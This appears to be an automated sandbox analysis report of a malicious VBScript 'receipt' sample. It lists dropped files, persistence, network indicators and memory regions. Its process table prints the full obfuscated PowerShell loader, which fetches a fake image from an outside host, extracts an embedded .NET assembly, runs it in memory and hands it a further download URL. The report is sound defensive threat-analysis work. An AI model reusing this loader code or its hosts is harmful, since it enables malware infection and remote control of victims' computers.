Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
S847453-receipt.vbs
|
Unicode text, UTF-16, little-endian text, with CRLF line terminators
|
initial sample
|
 |
|
|
C:\ProgramData\escudellar.vbs
|
ASCII text, with CRLF line terminators
|
dropped
|
|
|
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\Pz7Nj[1].txt
|
Unicode text, UTF-8 text, with very long lines (11197), with CRLF line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\Log.tmp
|
Generic INItialization configuration [WIN]
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nqjjraf.ygi.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qo22wsrj.kk3.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rgl0ie2x.ovk.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zgnitp0j.knq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\RegAsm.lnk
|
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat May 4 06:48:57
2024, mtime=Sat May 4 06:48:57 2024, atime=Sat May 4 06:48:57 2024, length=65440, window=hide
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\RegAsm.exe
|
PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
|
dropped
|
||
|
\Device\Mup\user-PC*\MAILSLOT\NET\NETLOGON
|
data
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\samr
|
GLS_BINARY_LSB_FIRST
|
dropped
|
||
|
\Device\Mup\user-PC\PIPE\wkssvc
|
GLS_BINARY_LSB_FIRST
|
dropped
|
There are 5 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\System32\wscript.exe
|
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\S847453-receipt.vbs"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDcDgTreMwDgTrevDgTreDcDgTreOQDgTre3DgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDMDgTreODgTreDgTre4DgTreDIDgTreMDgTreDgTreyDgTreDkDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreLgBHDgTreGUDgTredDgTreBUDgTreHkDgTrecDgTreBlDgTreCgDgTreJwBQDgTreFIDgTreTwBKDgTreEUDgTreVDgTreBPDgTreEEDgTreVQBUDgTreE8DgTreTQBBDgTreEMDgTreQQBPDgTreC4DgTreVgBCDgTreC4DgTreSDgTreBvDgTreG0DgTreZQDgTrenDgTreCkDgTreOwDgTregDgTreCQDgTrebQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreC4DgTreRwBlDgTreHQDgTreTQBlDgTreHQDgTreaDgTreBvDgTreGQDgTreKDgTreDgTrenDgTreFYDgTreQQBJDgTreCcDgTreKQDgTreuDgTreEkDgTrebgB2DgTreG8DgTreawBlDgTreCgDgTreJDgTreBuDgTreHUDgTrebDgTreBsDgTreCwDgTreIDgTreBbDgTreG8DgTreYgBqDgTreGUDgTreYwB0DgTreFsDgTreXQBdDgTreCDgTreDgTreKDgTreDgTrenDgTreHQDgTreeDgTreB0DgTreC4DgTreeQBhDgTreG0DgTrebwB3DgTreHgDgTreLwBtDgTreG4DgTreLwBtDgTreG8DgTreYwDgTreuDgTreDcDgTreMgBlDgTreHYDgTrebDgTreBvDgTreHYDgTreZQDgTreuDgTreHcDgTredwB3DgTreC8DgTreLwDgTre6DgTreHMDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreMQDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreQwDgTre6DgTreFwDgTreUDgTreByDgTreG8DgTreZwByDgTreGEDgTrebQBEDgTreGEDgTredDgTreBhDgTreFwDgTreJwDgTregDgTreCwDgTreIDgTreDgTrenDgTreGUDgTrecwBjDgTreHUDgTreZDgTreBlDgTreGwDgTrebDgTreBhDgTreHIDgTreJwDgTresDgTreCcDgTreUgBlDgTreGcDgTreQQBzDgTreG0DgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd
= [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe
-windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command
"function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData =
@(); $shuffledLinks = $links | Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData
+= $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029',
'https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029'); $imageBytes = DownloadDataFromLinks
$links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>';
$endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex
-ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command
= $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly
= [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method
= $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.yamowx/mn/moc.72evlove.www//:sptth' , '1' , 'C:\ProgramData\' , 'escudellar','RegAsm',''))}
}"
|
|
|
|
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\escudellar.vbs"
|
|
|
|
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
|
"C:\Windows\Microsoft.Net\Framework\v4.0.30319\RegAsm.exe"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\escudellar.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\escudellar.vbs"
|
|
|
|
C:\Windows\System32\wscript.exe
|
"C:\Windows\System32\WScript.exe" "C:\ProgramData\escudellar.vbs"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
|
|
|
https://www.evolve27.com/nm/xwomay.txt
|
131.153.147.50
|
|
|
|
xwormay8450.duckdns.org
|
|
||
|
https://uploaddeimagens.com.br
|
unknown
|
|
|
|
https://uploaddeimagens.com.br/images/004/773/797/original/new_image.jpg?1713882029
|
104.21.45.138
|
|
|
|
http://app01.system.com.br/RDWeb/Pages/login.aspx
|
unknown
|
|
|
|
https://paste.ee/d/Pz7Nj
|
172.67.187.200
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxoG2
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://pastzangam.zangamzangam/d/Pz7Nj
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxelp_
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://www.google.com;
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://paste.ee/;
|
unknown
|
||
|
https://analytics.paste.ee
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxd
|
unknown
|
||
|
https://www.google.com
|
unknown
|
||
|
https://paste.ee/d/Pz7Njec1
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://paste.ee/
|
unknown
|
||
|
https://analytics.paste.ee;
|
unknown
|
||
|
http://app01.system.com.br/RDWeb/Pages/login.aspxW
|
unknown
|
||
|
https://cdnjs.cloudflare.com
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://cdnjs.cloudflare.com;
|
unknown
|
||
|
https://pastzangam.zangamzangam/d/Pz7NjC
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://secure.gravatar.com
|
unknown
|
||
|
https://themes.googleusercontent.com
|
unknown
|
There are 24 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
evolve27.com
|
131.153.147.50
|
|
|
|
xwormay8450.duckdns.org
|
12.221.146.138
|
|
|
|
uploaddeimagens.com.br
|
104.21.45.138
|
|
|
|
www.evolve27.com
|
unknown
|
|
|
|
paste.ee
|
172.67.187.200
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
104.21.45.138
|
uploaddeimagens.com.br
|
United States
|
|
|
|
12.221.146.138
|
xwormay8450.duckdns.org
|
United States
|
|
|
|
131.153.147.50
|
evolve27.com
|
United States
|
|
|
|
172.67.187.200
|
paste.ee
|
United States
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
|
Path
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 5 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
32A1000
|
trusted library allocation
|
page read and write
|
|
|
|
402000
|
remote allocation
|
page execute and read and write
|
|
|
|
D1AC6FF000
|
stack
|
page read and write
|
||
|
1A860F42000
|
heap
|
page read and write
|
||
|
2090042B000
|
trusted library allocation
|
page read and write
|
||
|
645CFFF000
|
stack
|
page read and write
|
||
|
2090001F000
|
trusted library allocation
|
page read and write
|
||
|
1A860242000
|
heap
|
page read and write
|
||
|
7424F5000
|
stack
|
page read and write
|
||
|
2B8BCE05000
|
heap
|
page read and write
|
||
|
1C586402000
|
trusted library allocation
|
page read and write
|
||
|
12F7000
|
stack
|
page read and write
|
||
|
2090006C000
|
trusted library allocation
|
page read and write
|
||
|
1A85E59E000
|
heap
|
page read and write
|
||
|
1A861042000
|
heap
|
page read and write
|
||
|
1A860220000
|
heap
|
page read and write
|
||
|
18B2841C000
|
heap
|
page read and write
|
||
|
62D0000
|
trusted library allocation
|
page execute and read and write
|
||
|
4D94D7E000
|
stack
|
page read and write
|
||
|
7FFD9B890000
|
trusted library allocation
|
page read and write
|
||
|
1A8610EB000
|
heap
|
page read and write
|
||
|
2B8BCA11000
|
heap
|
page read and write
|
||
|
F6289FF000
|
stack
|
page read and write
|
||
|
2096EEE0000
|
heap
|
page execute and read and write
|
||
|
1A85E55C000
|
heap
|
page read and write
|
||
|
32D2000
|
trusted library allocation
|
page read and write
|
||
|
1A860227000
|
heap
|
page read and write
|
||
|
F628AFE000
|
stack
|
page read and write
|
||
|
1C583DA0000
|
trusted library allocation
|
page read and write
|
||
|
1A8610D8000
|
heap
|
page read and write
|
||
|
1C583DD4000
|
trusted library allocation
|
page read and write
|
||
|
7429FE000
|
stack
|
page read and write
|
||
|
209005A7000
|
trusted library allocation
|
page read and write
|
||
|
1C585FD6000
|
trusted library allocation
|
page read and write
|
||
|
5CB9000
|
trusted library allocation
|
page read and write
|
||
|
1C583CF1000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B950000
|
trusted library allocation
|
page read and write
|
||
|
18B28414000
|
heap
|
page read and write
|
||
|
1A860840000
|
heap
|
page read and write
|
||
|
1A8610E9000
|
heap
|
page read and write
|
||
|
1660000
|
heap
|
page read and write
|
||
|
742EFF000
|
stack
|
page read and write
|
||
|
18B2843B000
|
heap
|
page read and write
|
||
|
18B2A2B0000
|
trusted library allocation
|
page read and write
|
||
|
645DBCD000
|
stack
|
page read and write
|
||
|
7FFD9B642000
|
trusted library allocation
|
page read and write
|
||
|
15D6000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B8BCA05000
|
heap
|
page read and write
|
||
|
7FFD9B8E0000
|
trusted library allocation
|
page read and write
|
||
|
1C581797000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B822000
|
trusted library allocation
|
page read and write
|
||
|
2096D479000
|
heap
|
page read and write
|
||
|
7FFD9B643000
|
trusted library allocation
|
page execute and read and write
|
||
|
18B2842B000
|
heap
|
page read and write
|
||
|
7FFD9B644000
|
trusted library allocation
|
page read and write
|
||
|
4304000
|
trusted library allocation
|
page read and write
|
||
|
18B28501000
|
heap
|
page read and write
|
||
|
18B28417000
|
heap
|
page read and write
|
||
|
1A860AA0000
|
heap
|
page read and write
|
||
|
1A860AC0000
|
heap
|
page read and write
|
||
|
1A861042000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
1A861019000
|
heap
|
page read and write
|
||
|
2B8BCA37000
|
heap
|
page read and write
|
||
|
32D8000
|
trusted library allocation
|
page read and write
|
||
|
1A85E620000
|
heap
|
page read and write
|
||
|
2854A207000
|
heap
|
page read and write
|
||
|
2096F464000
|
heap
|
page read and write
|
||
|
1C5803DC000
|
trusted library allocation
|
page read and write
|
||
|
5F3B000
|
trusted library allocation
|
page read and write
|
||
|
28548259000
|
heap
|
page read and write
|
||
|
1590000
|
heap
|
page read and write
|
||
|
1C590001000
|
trusted library allocation
|
page read and write
|
||
|
1A8605EA000
|
heap
|
page read and write
|
||
|
2090044D000
|
trusted library allocation
|
page read and write
|
||
|
18B28468000
|
heap
|
page read and write
|
||
|
2854A220000
|
heap
|
page read and write
|
||
|
301E000
|
stack
|
page read and write
|
||
|
1A860645000
|
heap
|
page read and write
|
||
|
2096D410000
|
heap
|
page read and write
|
||
|
18B28417000
|
heap
|
page read and write
|
||
|
1A85E470000
|
heap
|
page read and write
|
||
|
2854825E000
|
heap
|
page read and write
|
||
|
4D94B3F000
|
unkown
|
page read and write
|
||
|
1A8605AA000
|
heap
|
page read and write
|
||
|
1A8610DD000
|
heap
|
page read and write
|
||
|
28548430000
|
heap
|
page read and write
|
||
|
2B8BCA5B000
|
heap
|
page read and write
|
||
|
15C0000
|
trusted library allocation
|
page read and write
|
||
|
18B2843B000
|
heap
|
page read and write
|
||
|
20900704000
|
trusted library allocation
|
page read and write
|
||
|
1A860850000
|
heap
|
page read and write
|
||
|
2096D42F000
|
heap
|
page read and write
|
||
|
1A85E535000
|
heap
|
page read and write
|
||
|
1A860247000
|
heap
|
page read and write
|
||
|
5F29000
|
stack
|
page read and write
|
||
|
2854825F000
|
heap
|
page read and write
|
||
|
1A86024E000
|
heap
|
page read and write
|
||
|
2096F4E0000
|
heap
|
page read and write
|
||
|
573E000
|
stack
|
